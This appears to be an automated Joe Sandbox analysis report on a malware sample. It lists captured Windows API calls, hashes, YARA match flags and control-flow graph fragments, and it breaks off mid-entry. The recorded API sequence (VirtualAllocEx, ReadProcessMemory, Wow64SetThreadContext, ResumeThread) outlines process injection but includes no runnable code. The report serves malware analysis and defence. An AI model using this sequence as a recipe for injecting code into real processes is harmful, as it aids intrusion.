                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePeek
                                                                                    • String ID:
                                                                                    • API String ID: 2222842502-0
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0139D66E,?,?,?,?,?), ref: 0139D72F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2067637310.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1390000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0139D66E,?,?,?,?,?), ref: 0139D72F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2067637310.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1390000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 058B8720
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 058B805E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    APIs
                                                                                    • EnumThreadWindows.USER32(?,00000000,?), ref: 0BE66131
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumThreadWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2941952884-0
                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 058B8720
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    APIs
                                                                                    • GetClassInfoW.USER32(?,00000000), ref: 058BD29C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassInfo
                                                                                    • String ID:
                                                                                    • API String ID: 3534257612-0
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 058B805E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    APIs
                                                                                    • GetClassInfoW.USER32(?,00000000), ref: 058BD29C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassInfo
                                                                                    • String ID:
                                                                                    • API String ID: 3534257612-0
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 076C1F65
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2071342526.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76c0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    APIs
                                                                                    • EnumThreadWindows.USER32(?,00000000,?), ref: 0BE66131
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumThreadWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2941952884-0
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 076C1F65
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2071342526.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76c0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 058B855E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    APIs
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 058BD1AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: TextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 530164218-0
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0BFA1582,00000000,00000000,03D14128,02D308B0), ref: 0BFA19D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePeek
                                                                                    • String ID:
                                                                                    • API String ID: 2222842502-0
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,0BFA160F,00000000,03D14128,02D308B0,00000000,?), ref: 0BFA1D6D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 058B855E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    APIs
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 058BD1AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: TextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 530164218-0
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,0BFA160F,00000000,03D14128,02D308B0,00000000,?), ref: 0BFA1D6D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?,?,?,?,?,0BE67999,?,?,00000000), ref: 0BE67A0D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 0BE6CB25
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?,?,?,?,?,0BE67999,?,?,00000000), ref: 0BE67A0D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0139B41E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2067637310.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1390000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?,?,?,?,?,0BE67999,?,?,00000000), ref: 0BE67A0D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    APIs
                                                                                    • SetTimer.USER32(?,02CC6428,?,?,?,?,?,?,052C5378,00000000,00000000,?), ref: 052C551D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070032798.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_52c0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: Timer
                                                                                    • String ID:
                                                                                    • API String ID: 2870079774-0
                                                                                    APIs
                                                                                    • SetTimer.USER32(?,02CC6428,?,?,?,?,?,?,052C5378,00000000,00000000,?), ref: 052C551D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070032798.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_52c0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: Timer
                                                                                    • String ID:
                                                                                    • API String ID: 2870079774-0
                                                                                    APIs
                                                                                    • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0BFA16C7), ref: 0BFA223D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatchMessage
                                                                                    • String ID:
                                                                                    • API String ID: 2061451462-0
                                                                                    APIs
                                                                                    • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0BFA16C7), ref: 0BFA223D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatchMessage
                                                                                    • String ID:
                                                                                    • API String ID: 2061451462-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $(&cq$(gq$Hgq
                                                                                    • API String ID: 0-2835895591
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: fff?
                                                                                    • API String ID: 0-4136771917
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f1f025d396836bedf25391717f4a7ceeec4c605ed2fadcb25d6243860a791c58
                                                                                    • Instruction ID: d9fbe5f17fba0bbee700b088b5a797df77b080d967fec6e7b09b7d6c7537b3fa
                                                                                    • Opcode Fuzzy Hash: f1f025d396836bedf25391717f4a7ceeec4c605ed2fadcb25d6243860a791c58
                                                                                    • Instruction Fuzzy Hash: DCE1F874E042199FDB14DFA9C5809AEFBF2BF89304F248169D814AB356D770AD42CFA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 306b268a6b09a62d4dc0a9b7e07ba251afca53804898374c9586dcd763136a39
                                                                                    • Instruction ID: e6eb39b853e8f79ac14f92d1d2a97870315be63f0f9b6d45e7a8d591fd118375
                                                                                    • Opcode Fuzzy Hash: 306b268a6b09a62d4dc0a9b7e07ba251afca53804898374c9586dcd763136a39
                                                                                    • Instruction Fuzzy Hash: 2BE11674E042199FDB14DFA8C5809AEFBB6FF89304F24816AD814AB355D770AD82CF61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 277514a9e6c7340defb4b0a64c9d2084caed250a80a179a007161e0c4f6e3886
                                                                                    • Instruction ID: 51a3e8f9fede668c1961d289d448139d4b19cc5530c41019865aae695f539652
                                                                                    • Opcode Fuzzy Hash: 277514a9e6c7340defb4b0a64c9d2084caed250a80a179a007161e0c4f6e3886
                                                                                    • Instruction Fuzzy Hash: FBE11574E042199FDB14DFA9C5809AEFBB2BF89304F248169D815AB356D730AD82CF61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c6d77606c669eef93595bf50d5aaeed5ac0ed4744ce08a3a053e791c4235f3f3
                                                                                    • Instruction ID: 8673ae0320fd96638f9e51b7b681ac1f55692a39cbf90d7720a16b2bae697bb5
                                                                                    • Opcode Fuzzy Hash: c6d77606c669eef93595bf50d5aaeed5ac0ed4744ce08a3a053e791c4235f3f3
                                                                                    • Instruction Fuzzy Hash: 33E106B4E042199FDB14DFA9C5809AEFBB2FF89304F248169D814AB355D770AD82CF61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070032798.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_52c0000_W3MzrFzSF0.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070032798.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_52c0000_W3MzrFzSF0.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd

                                                                                    Execution Graph

                                                                                    Execution Coverage:1.2%
                                                                                    Dynamic/Decrypted Code Coverage:5.1%
                                                                                    Signature Coverage:8.8%
                                                                                    Total number of Nodes:137
                                                                                    Total number of Limit Nodes:11

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 62 417983-4179ac call 42f553 65 4179b2-4179c0 call 42fb53 62->65 66 4179ae-4179b1 62->66 69 4179d0-4179e1 call 42e003 65->69 70 4179c2-4179cd call 42fdf3 65->70 75 4179e3-4179f7 LdrLoadDll 69->75 76 4179fa-4179fd 69->76 70->69 75->76
                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179F5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 87 42c893-42c8cf call 404583 call 42daf3 NtClose
                                                                                    APIs
                                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C8CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 108 58c2df0-58c2dfc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 107 58c2c70-58c2c7c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 106 58c2b60-58c2b6c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(72Z53078,00000111,00000000,00000000), ref: 0041425A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: 72Z53078$72Z53078

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 15 4141b5-4141b6 16 414202-41424d call 42f423 call 417983 call 404533 call 424ff3 15->16 17 4141b8-4141d4 15->17 26 41426d-414273 16->26 27 41424f-41425e PostThreadMessageW 16->27 17->16 27->26 28 414260-41426a 27->28 28->26
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(72Z53078,00000111,00000000,00000000), ref: 0041425A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: 72Z53078$72Z53078

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 29 4141e3-4141f5 30 4141fd-41424d call 42f423 call 417983 call 404533 call 424ff3 29->30 31 4141f8 call 42ea13 29->31 41 41426d-414273 30->41 42 41424f-41425e PostThreadMessageW 30->42 31->30 42->41 43 414260-41426a 42->43 43->41
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(72Z53078,00000111,00000000,00000000), ref: 0041425A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: 72Z53078$72Z53078
                                                                                    • API String ID: 1836367815-1643533592

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 77 42cbd3-42cc17 call 404583 call 42daf3 RtlAllocateHeap
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(?,0041E72E,?,?,00000000,?,0041E72E,?,?,?), ref: 0042CC12
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 82 42cc23-42cc67 call 404583 call 42daf3 RtlFreeHeap
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,74C08500,00000007,00000000,00000004,00000000,004171FB,000000F4), ref: 0042CC62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 92 42cc73-42ccac call 404583 call 42daf3 ExitProcess
                                                                                    APIs
                                                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,9F81E24E,?,?,9F81E24E), ref: 0042CCA7
                                                                                    Memory Dump Source
